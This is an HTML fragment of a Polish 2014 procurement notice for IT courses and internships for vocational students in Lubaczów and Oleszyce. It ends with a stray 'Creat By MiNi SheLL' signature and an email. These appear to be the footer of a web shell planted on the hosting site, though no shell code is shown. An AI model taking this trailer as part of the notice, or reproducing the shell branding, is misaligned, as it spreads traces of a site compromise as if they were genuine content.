<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 - Szkolenia informatyczne - zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja następujących szkoleń: 1) AutoCAD/Mechanikal dla uczniów - 12 uczniów ZS w Lubaczowie, w wymiarze 40 godz. lekcyjnych,
2) Kurs Inventor dla uczniów - uczniowie ZS w Lubaczowie 2 grupy po 12 osób, w wymiarze 40 godz. lekcyjnych dla każdej grupy,
3) Kurs  projektowania w  programie AutoCaD  - budowa części maszyn rolniczych - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Architektury Krajobrazu, Technik Rolnik oraz dla Zasadniczej Szkoły Zawodowej kierunek: Rolnik,  I grupa 10 osób, II grupa 10 osób, w wymiarze 9 godz. lekcyjnych dla każdej grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 - Kursy / Szkolenia informatyczne dla beneficjentów projektu: Podkarpacie stawia na zawodowców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja następujących kursów / szkoleń: 1)	Kurs: Wdrażanie i obsługa infrastruktury sieci systemu Microsoft Windows Server  2003 oraz zarządzanie nią - 2 nauczycieli ZS w Lubaczowie, w wymiarze 30 godz. lekcyjnych,
2) Kurs Academia Cisco dla uczniów - kurs dla uczniów Technikum Informatycznego ZS w Lubaczowie, I grupa 15 osób,  w wymiarze 120 godz. lekcyjnych,
3) Kurs ECDL dla uczniów - kurs dla uczniów Technikum Informatycznego ZS w Lubaczowie, I grupa 15 osób, w wymiarze 120 godz. lekcyjnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4 - Praktyki dla beneficjentów projektu: Podkarpacie stawia na zawodowców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja następujących praktyk: 1) Zajęcia praktyczne terenowe w gospodarstwach rolnych - I grupa 10 osób, w wymiarze 3 dni po 6 godz. zegarowych,
2) Praktyka ponadprogramowa w gospodarstwach ogrodniczych - I grupa 5 osób, w wymiarze 5 dni roboczych,
3) Praktyka zawodowa 4-tygodniowa - dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 26 osób,  w wymiarze 160 godz. lekcyjnych w ciągu 20 dni roboczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com